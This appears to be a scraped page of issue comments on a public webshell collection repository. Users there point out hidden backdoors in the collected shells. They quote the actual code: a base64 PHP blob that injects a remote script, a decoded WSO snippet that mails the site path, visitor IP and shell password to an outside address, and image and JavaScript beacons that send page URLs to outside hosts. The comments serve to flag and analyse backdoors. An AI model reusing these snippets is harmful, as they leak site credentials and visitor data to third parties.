- 🌱 I’m currently learning golang
- 💪(ง •_•)ง💪
tennc / webshell Goto Github PK
View Code? Open in Web Editor NEWThis is a webshell open source project
Home Page: http://tennc.github.io
License: MIT License
This is a webshell open source project
Home Page: http://tennc.github.io
License: MIT License
Line855:
uc(dx()) = "http://adgoog.gicp.net/index.asp?ct="
In the code <img src=\"http://emp3ror.com/images/emplogo1.gif\">
send the referer of path to emp3ror.com server. The administrator catch all referers into emp3ror.com server log. Dont be evil.
Other backdoor: <?php echo base64_decode('PFNDUklQVCBTUkM9JiN4NjgmI3g3NCYjeDc0JiN4NzAmI3gzYSYjeDJmJiN4MmYmI3g3NyYjeDc3JiN4NzcmI3gyZSYjeDZjJiN4NmYmI3g2MyYjeDYxJiN4NmMmI3g3MiYjeDZmJiN4NmYmI3g3NCYjeDJlJiN4NmUmI3g2NSYjeDc0JiN4MmYmI3g2OSYjeDYyJiN4NmUmI3g2NSYjeDZjJiN4NjUmI3g3MiYjeDJmJiN4NzkmI3g2MSYjeDdhJiN4MmUmI3g2YSYjeDczPjwvU0NSSVBUPiANCg==');?>
The render is: a=new/**/Image();a.src='http://localroot.net/ibneler/index.php?a='+escape(location.href);
This send the referer site to other persons.
This shell is dirty.
https://www.douyin.com/user/self?modal_id=7335646668769021199&showTab=post
支持shell、 文件管理,分屏。支持录屏回放
wl168168.php is a webshell?
i have never know about it.
can you give me a link about it? 3q.
The following submodule repo reports a 404 error:
[submodule "ysrc/webshell-sample"]
path = ysrc/webshell-sample
url = https://github.com/ysrc/webshell-sample
If the repo is no longer there, can this submodule be deleted?
这个代码有问题呀,next 这个就会报错。Notice: Use of undefined constant next - assumed 'next' in
asx73ert 这个不是assert 应该也会报错吧。function 'asx73ert' not found or invalid function name in
我的测试环境是PHP5.6.8
好歹给个密码
in Line 75 you can see this code
$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff));
when i decode it i see mail() function to send (path ,password ,visitor ip) to this email [email protected] @mail("[email protected]",$judul,$body,$auth_pass);
如题
$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
eval(base64_decode($wsobuff));
解码过后
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WSO 2.6 http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
**if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }**
}
else { $visitc++; }
@setcookie("visitz",$visitc);
Hey there!
I belong to an open source security research community, and a member (@rohit75033) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Hi guys! First off, thanks for your page.
I'm looking mysql shell-client for jsp. (I just want browse tables,columns)
I've founded mysql client in one of your shell's but there i can do just simple sql commands, that doesn't enough for me. Any help?
If you try to run this file on a newer webserver:
webshell/web-malware-collection-13-06-2012/PHP/c99.txt
You get lots of php errors
could you update the shell to php7 pls?
<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***.***.***/ghost.php&p=ghost"/>
In the code: eg: /etc/passwd<br><? ...
use the short tag, not all servers support this. Change to <?php
webshell/www-7jyewu-cn/DOC_ZIBSZXBIEG.php这个目录下的
1268行存在后门,注明一下,这个还是不错的一个shell.
谢谢提供webshell的收集。
我fork了你的webshell,但是我希望我的repo里面确定都是没有后门的shells。所以打算依次检查所有的文件。
我看到你的readme写到:“所有shell 本人不保证是否有后门,但是自己上传的绝不会故意加后门”
可否在你的readme中加上你自己确认没有病毒的shell的文件列表,这样我可以少检查很多shells :)
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.